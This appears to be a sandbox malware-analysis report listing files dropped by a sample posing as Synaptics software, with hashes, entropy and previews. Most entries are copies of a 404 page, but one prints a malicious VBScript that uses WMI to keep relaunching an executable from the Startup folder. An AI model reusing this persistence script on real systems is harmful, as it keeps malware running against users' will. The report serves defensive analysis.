                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HhXNmiC2k-Y1UROeenqkGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\AebBCvK.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268651649040539
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VU+pAZewRDK4mW
                                                                                                                                                      MD5:93B6F29FFF825A0D5B46C1AF6BE55C40
                                                                                                                                                      SHA1:D1562D25FE9D07C56CCAF078064512FD82C560E0
                                                                                                                                                      SHA-256:AEAFD2DCAF3F6DBF3B1D576D3336204847A556E97B290941A8CC9ED8B63BA3FE
                                                                                                                                                      SHA-512:F5E9A7515289CA9F36C577F7656C72F9D08D80AC665BA30C74CBE79FA4DB4BD163CAFE4F667876F5EFA21A63C0EB38E642F1A59CCF8162AC3CC59DD666022050
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rTLBSXvVDjhuALX9znttUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\BQQQVU.vbs

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):895
                                                                                                                                                      Entropy (8bit):5.347597076563469
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dF/UFH/uVMHiU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFH/ucXt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                      MD5:7BB58FF78D75879AE06480639AB73331
                                                                                                                                                      SHA1:43D51FF2EF0250C7C9405E4FA66E9C7DC6C6F939
                                                                                                                                                      SHA-256:EDD007E84A2C981F90A34E3EE48A9721A3D296DE2FBAD9134616D99A58E852C0
                                                                                                                                                      SHA-512:2A9794B3FC7864D57965C963E438180B8555B1505F4B10F489E4E8CB09A20504A196E0A1FBEDDD133BCAED8DAFADC57C39E93ECEED2153E724B9E3EF3B032CCC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_update.exe"..fileset = """C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\De9THcW.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.280951993189178
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mbTISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x8+pAZewRDK4mW
                                                                                                                                                      MD5:685F906D4982428084D0C0AA4C8D7F58
                                                                                                                                                      SHA1:F88C63C58010E27A9E21F74AE6D7AC1E5CCBD04C
                                                                                                                                                      SHA-256:F079991EBB7F047A57956D39D8A5CB648EE94836536A50A993F59C4A490B89A2
                                                                                                                                                      SHA-512:B1AFAA4078D2BAABE69637CD61C9B42769C39731D2D3C602D35E3534DD3B74EFF9C5D5A17558D2DB91C30D86BC679B0C7FD2B9A356483982ADD933367D8A8BEB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GVrlVNhQZhYJH6fFMOdXTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\GJTxyp9.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262349978210253
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                                                      MD5:EDA7E10E91357673262997692BB803A2
                                                                                                                                                      SHA1:F7C797809CE75BF8CD44A853E8115DED6E1EAABF
                                                                                                                                                      SHA-256:B6B6F5A1F6722291B6D197940A734A7156FCE2D0C9370F870C68A232CD569818
                                                                                                                                                      SHA-512:263620CB421FD71CF720F37CEFDEFB810FDC415BA87F7F769EF7DD2774BFFF68FE0D5D8BE015C23339FAD4DF8B21E4B5AF2EA2447146D02028843349C43AC655
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mbwHNScXWWUX3g1D94dnLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IMStML3.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2527910785737655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0L1gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ug+pAZewRDK4mW
                                                                                                                                                      MD5:2C9AD2C7148528384BFF717A972CA3BE
                                                                                                                                                      SHA1:F9CEC866F36FE672D14B771388E5620826F08BCC
                                                                                                                                                      SHA-256:F87BB41F235FC562A57C0F2A2F4788B7A2D3085653AFF7EC057660DFE328B5B0
                                                                                                                                                      SHA-512:E985210FEC0BDA56D2E0B59130FF1328F20C184A9DFAB253216D2EAC06DD41C1A3E13CB11E31C6D01451FF007B98201B3D88E9AB33F47A007D6D31FBC54A816D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K5QOagPcwddrLgLEwC-yPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\IOxPY66.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267275139829966
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Ya8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                      MD5:0A2906210742E8799DE80BCF2C534AF0
                                                                                                                                                      SHA1:5D1081E8D98F92EDFF5156EF4E5F60141F90538B
                                                                                                                                                      SHA-256:913FE74747239CA31BA0E9C24EAA1B3CAFBAC02389733904CB217532B3B341CE
                                                                                                                                                      SHA-512:8CBB0E5528FF80EC5DE9A029CE03AE017F6EAAABC66D6FF629D3FA4F1DA2E5F704F27466ACE875D84C6F6AD14BC01B0D833C42AADAC1667350194C924E2E90C9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aOH_VYf_NVSb4A7Br6l7ww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\KOx6ooH.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261259934587398
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:A5DD7F05D84E441C3F7D50B627406548
                                                                                                                                                      SHA1:CB3A9A38EFFF5BF17836D30F57FA3C68014BD5D3
                                                                                                                                                      SHA-256:8E71066E6BB423A6ADEEA24C7025540663FA1E045BC87E4DBA2912B0F868845A
                                                                                                                                                      SHA-512:5153C1E049E01D30827F7622856696571ED1E6D6033025E24D637FC70FC4977E5C6769F8CB7E07AD74317D81B411DE9CF99D0DF9B3F604F7131B00391688C574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YhSB5s5Vf_8vuIuRzlwbpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\KRt7ZEr.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264824714831566
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Q1vaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+51va+pAZewRDK4mW
                                                                                                                                                      MD5:DE8F68BE681074811DE2A57BB920EF10
                                                                                                                                                      SHA1:6DB059E3180253D071B74094DC3D4428EFD90F04
                                                                                                                                                      SHA-256:7463BF3C21AFAF9F70A8AF362B4F6834F4FC4308970BDC80CB139CC47B50DB30
                                                                                                                                                      SHA-512:562BC53CE8F5DAA4E7073E17D6CFA52AEF20E3781FC24D1AEE7AA8BDBE30A82711E22B31CCA81A739C5D485BA16D7E6BC2DF5E1CCE9429C723058554948A5552
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9ZPL5uSIdH-cpkQbhWUxZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Kv1GzPb.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261610230085772
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                      MD5:44BAB6C3E933860CCCDC94FCF2944EBC
                                                                                                                                                      SHA1:A395EF1FD8DD46AD96A4481741F147DFA8C3685C
                                                                                                                                                      SHA-256:9B5D8494EA53503F829AA4F093C9AD492450B52E2A716A1A35BF0BE05F36D76C
                                                                                                                                                      SHA-512:773A36BEE8DF46506D643A01B2E4E1D4571C828C85CE39F65D1B3F4607AA85FB0B8EE50C4D9D49DD7F325063915B9F59FB8BFCEDB134D7EC74D4220695BEB94B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UoqoKK2859mVz-z-SRG0Mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\LkffEUy.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261492426839114
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+PTD+pAZewRDK4mW
                                                                                                                                                      MD5:5B923172366E6A38665628684BE08EA7
                                                                                                                                                      SHA1:D32A72D28A3DD6E8EA7296A280043E2FAB091AA0
                                                                                                                                                      SHA-256:3D1EC32E9AB8FF725A748B76EC80018E75A825849073F24272C06ADCB0171BC1
                                                                                                                                                      SHA-512:EDD4BCF66C2341EBE5F8157436C2781604A2DA2EEA2904A375E7B90DDFD1512A7BE19D177A866C9D7D92A1881A80E38B79D5DCEF299CEC8A38BACB666296D879
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1WxF5sM0QDmDi8hGug9COw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ML4tpKT.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.259361967915171
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tM+pAZewRDK4mW
                                                                                                                                                      MD5:B42FB950218B0DE3AC5BAB16F3CDD003
                                                                                                                                                      SHA1:D70252D83DE764D5343CB5C7C569A21F14E9008E
                                                                                                                                                      SHA-256:41EB0ED7F1F417DE64DE3738A80154CC4E44F0A6364941772F5212E167A6083E
                                                                                                                                                      SHA-512:A49F19510955407DFE91126C27637F98F0C51D47B25C8E458D88E9FC69272EC7344684FC7D219C568DBD4107EBFB8AA7FDE82D920DB0225D34BF87E5B655B68A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rcQBpnEy9vpt-Su_F33JzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MRiKiDL.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264537047499486
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                      MD5:939A118F54551C28526068B285BB33BE
                                                                                                                                                      SHA1:FE76733C43A0D238394E0968C18BB97CB5A327C3
                                                                                                                                                      SHA-256:7122CBE851399B04FA2430DC6FA3EF2B9EFA0838C6C910EA6309270DF6A65BB9
                                                                                                                                                      SHA-512:A50B4CBB9AF77006F1F68BB1503A2A533FB64FE575C2183A71194790E017C571086DCB1F839B77817E3456323488F27ABD57DAB829CD30F8C908F5898ED32B92
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SqLeEebqr1oOIoUgMXXzIQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MYS4soS.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261966481856597
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                                                      MD5:341DE5AEC3A525C3429B78209F1D5DD9
                                                                                                                                                      SHA1:A3BF0AAEFD0869AFCB82CD4C1A6EC92042928CBC
                                                                                                                                                      SHA-256:C4CDD2137FD9CEA2BFE6AA7F66D39E60ACB9D5DE676B018C3F71AD5A196AD41C
                                                                                                                                                      SHA-512:E5EC4CAD58FA4BB8C5092D95B3DD89666BDFC83256B87CF332BC709B537A7457ED77C6E96E3B400F2052E1C323CD7294E26566EC782C12DF449F3B1880869E4E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KEVaDrgsVegwUIQHOwCmEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\NHPwCZP.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265002972678917
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                                      MD5:4F7984AB3365AAC6F2B4099A1AB3A5D2
                                                                                                                                                      SHA1:FC87D8F4B4806AFC8A565F9EE56E42A0C1703DCE
                                                                                                                                                      SHA-256:AB028CBCA23BFD469ACC16E55B83DEBAB07F3B883B022428AD6F4EFCFB1D52C2
                                                                                                                                                      SHA-512:100074B1E0D3B6389A51A605F0E6ECCEBF7F9DCCC30551FE147EF40A9262E0183B456B83FB2C6A6D6DF503D8C17CBBB424596E1DAAB4C07C5F905850E57B694C
                                                                                                                                                      Malicious:false
